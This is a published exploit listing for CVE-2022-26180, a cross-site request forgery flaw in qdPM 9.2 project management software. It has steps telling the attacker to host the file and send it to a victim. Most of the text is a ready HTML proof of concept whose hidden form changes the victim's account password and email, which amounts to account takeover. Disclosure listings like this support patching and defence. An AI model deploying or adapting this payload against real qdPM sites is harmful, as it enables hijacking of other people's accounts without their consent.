CVE-2022-26180: qdPM 9.2 Cross Site Request Forgery ≈ Packet Storm

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)# Google Dork: NA# Date: 03/27/2022# Exploit Author: Chetanya Sharma @AggressiveUser# Vendor Homepage: https://qdpm.net/# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download# Version: 9.2# Tested on: KALI OS# CVE : CVE-2022-26180#---------------Steps to Exploit :   1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.  2) send it to victim.<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">      <input type="hidden" name="sf_method" value="put" />      <input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly --->      <input type="hidden" name="users[photo_preview]" value="" />      <input type="hidden" name="users[name]" value="AggressiveUser" />      <input type="hidden" name="users[new_password]" value="TEST1122" />      <input type="hidden" name="users[email]" value="[email protected]" />      <input type="hidden" name="users[photo]" value="" />      <input type="hidden" name="users[culture]" value="en" />      <input type="submit" value="Submit request" />    </form>  </body></html>